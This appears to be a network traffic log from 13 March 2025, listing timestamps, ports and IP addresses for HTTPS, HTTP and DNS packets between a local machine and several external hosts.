Mar 13, 2025 10:49:00.619941950 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.655613899 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.655646086 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.655742884 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.655764103 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.655812025 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.675443888 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.675462008 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.675565004 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.675586939 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.708281040 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.708298922 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.708375931 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.708395004 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.722138882 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.722182989 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.722238064 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.722250938 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.722296000 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.742539883 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.742547989 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.742578983 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.742670059 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.742707014 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.742721081 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.750847101 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.750948906 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.750969887 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.768115044 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.768147945 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.768254995 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.768268108 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.768328905 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.779872894 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.780009031 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.780024052 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.780071974 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.791804075 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.791831970 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.791873932 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.791882992 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.791933060 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.800483942 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.800590038 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.800601006 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.811846018 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.811862946 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.811965942 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.811976910 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.817240953 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.817349911 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.817375898 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.827898979 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.827923059 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.828033924 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.828074932 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.833112955 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.833216906 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.833233118 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.844120979 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.844136000 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.844189882 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.844223022 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.844242096 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.847635031 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.847724915 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.847737074 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.855937004 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.855957985 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.856050014 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.856064081 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.856098890 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.862751961 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.862821102 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.862831116 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.870814085 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.870829105 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.870910883 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.870922089 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.870970964 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.877604008 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.877753973 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.877763987 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.877835989 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.880034924 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.888493061 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.888509989 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.888669968 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.888669968 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.888679981 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.888792038 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.895370960 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.895481110 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.895489931 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.906148911 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.906166077 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.906269073 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.906280041 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.910053968 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.910193920 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.910203934 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.939188957 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.939214945 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.939256907 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.939297915 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.939312935 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.939346075 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.939372063 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.944853067 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.944884062 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.944984913 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.944984913 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.944994926 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.945353985 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.949623108 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.949698925 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.949706078 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.969316006 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.969333887 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.969413042 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.969424009 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.969966888 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.970040083 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.970048904 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.981991053 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.982008934 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.982057095 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.982065916 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.982105017 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.983357906 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.983465910 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.983474016 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.987549067 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.987565041 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.987657070 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.987657070 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.987668037 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.993053913 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:00.993184090 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:00.993194103 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.004801989 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.004822016 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.004898071 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.004916906 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.004952908 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.007391930 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.007472992 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.007482052 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.026814938 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.026832104 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.026915073 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.026926994 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.029023886 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.029110909 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.029118061 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.037676096 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.037691116 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.037823915 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.037823915 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.037846088 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.051127911 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.051227093 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.051254988 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.058026075 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.058042049 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.058137894 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.058161020 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.058176994 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.058238983 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.058665991 CET | 49743 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.058681011 CET | 443 | 49743 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.107785940 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:01.107812881 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:01.108535051 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:01.109879971 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:01.109894037 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:01.150726080 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.150765896 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.150861025 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.151345968 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:01.151360989 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:01.351866007 CET | 49706 | 443 | 192.168.2.5 | 2.19.122.30 |
Mar 13, 2025 10:49:01.531510115 CET | 49707 | 80 | 192.168.2.5 | 172.217.18.99 |
Mar 13, 2025 10:49:01.531670094 CET | 49705 | 80 | 192.168.2.5 | 217.20.57.18 |
Mar 13, 2025 10:49:01.532104015 CET | 80 | 49705 | 217.20.57.18 | 192.168.2.5 |
Mar 13, 2025 10:49:01.532181978 CET | 49705 | 80 | 192.168.2.5 | 217.20.57.18 |
Mar 13, 2025 10:49:01.536421061 CET | 80 | 49705 | 217.20.57.18 | 192.168.2.5 |
Mar 13, 2025 10:49:01.536458969 CET | 80 | 49707 | 172.217.18.99 | 192.168.2.5 |
Mar 13, 2025 10:49:01.536540985 CET | 49707 | 80 | 192.168.2.5 | 172.217.18.99 |
Mar 13, 2025 10:49:03.055754900 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.061412096 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:03.061430931 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.062506914 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.062594891 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:03.073873043 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:03.073949099 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.074342012 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:03.074350119 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.089044094 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.089379072 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.089395046 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.090413094 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.090476036 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.090811014 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.090858936 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.091150999 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.091159105 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.128097057 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:03.144089937 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.692811966 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.692909002 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.692974091 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:03.693543911 CET | 49747 | 443 | 192.168.2.5 | 2.19.106.98 |
Mar 13, 2025 10:49:03.693563938 CET | 443 | 49747 | 2.19.106.98 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723119020 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723145008 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723154068 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723180056 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723191977 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723203897 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723217964 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.723233938 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723273039 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.723319054 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.723330975 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723371983 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.723376989 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723412037 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:03.723412037 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.723449945 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.725753069 CET | 49748 | 443 | 192.168.2.5 | 23.192.243.7 |
Mar 13, 2025 10:49:03.725769997 CET | 443 | 49748 | 23.192.243.7 | 192.168.2.5 |
Mar 13, 2025 10:49:08.863878965 CET | 443 | 49746 | 152.199.21.175 | 192.168.2.5 |
Mar 13, 2025 10:49:08.863951921 CET | 49746 | 443 | 192.168.2.5 | 152.199.21.175 |
Mar 13, 2025 10:49:08.864209890 CET | 49746 | 443 | 192.168.2.5 | 152.199.21.175 |
Mar 13, 2025 10:49:08.864229918 CET | 443 | 49746 | 152.199.21.175 | 192.168.2.5 |
Mar 13, 2025 10:49:08.864603043 CET | 49751 | 443 | 192.168.2.5 | 152.199.21.175 |
Mar 13, 2025 10:49:08.864662886 CET | 443 | 49751 | 152.199.21.175 | 192.168.2.5 |
Mar 13, 2025 10:49:08.864763975 CET | 49751 | 443 | 192.168.2.5 | 152.199.21.175 |
Mar 13, 2025 10:49:08.865092039 CET | 49751 | 443 | 192.168.2.5 | 152.199.21.175 |
Mar 13, 2025 10:49:08.865115881 CET | 443 | 49751 | 152.199.21.175 | 192.168.2.5 |
Mar 13, 2025 10:49:17.267517090 CET | 443 | 49751 | 152.199.21.175 | 192.168.2.5 |
Mar 13, 2025 10:49:17.268117905 CET | 49751 | 443 | 192.168.2.5 | 152.199.21.175 |
Mar 13, 2025 10:49:17.279532909 CET | 49751 | 443 | 192.168.2.5 | 152.199.21.175 |
Mar 13, 2025 10:49:17.279553890 CET | 443 | 49751 | 152.199.21.175 | 192.168.2.5 |
Mar 13, 2025 10:49:21.972090960 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:21.972131968 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:21.972203016 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:21.972590923 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:21.972600937 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:23.939774036 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:23.940058947 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:23.940088987 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:23.941206932 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:23.941267014 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:23.942277908 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:23.942388058 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:23.984175920 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:23.984200954 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:24.031033039 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:33.662352085 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:33.662440062 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Mar 13, 2025 10:49:33.662501097 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:33.908255100 CET | 49756 | 443 | 192.168.2.5 | 142.250.185.100 |
Mar 13, 2025 10:49:33.908279896 CET | 443 | 49756 | 142.250.185.100 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 13, 2025 10:48:17.642024994 CET | 53 | 61378 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:17.656281948 CET | 53 | 62169 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:21.001300097 CET | 53 | 63612 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:21.198767900 CET | 53 | 56796 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:21.907267094 CET | 57311 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:21.907476902 CET | 49508 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:21.913979053 CET | 53 | 57311 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:21.914177895 CET | 53 | 49508 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:23.393945932 CET | 61735 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:23.394258976 CET | 64980 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:23.489644051 CET | 53 | 61735 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:25.112082958 CET | 53 | 64980 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:26.168641090 CET | 53 | 51643 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:26.184205055 CET | 53 | 52997 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:38.358555079 CET | 53 | 60705 | 1.1.1.1 | 192.168.2.5 |
Mar 13, 2025 10:48:52.376128912 CET | 65502 | 53 | 192.168.2.5 | 1.1.1.1 |
Mar 13, 2025 10:48:52.376315117 CET | 64166 | 53 | 192.168.2.5 | 1.1.1.1 |
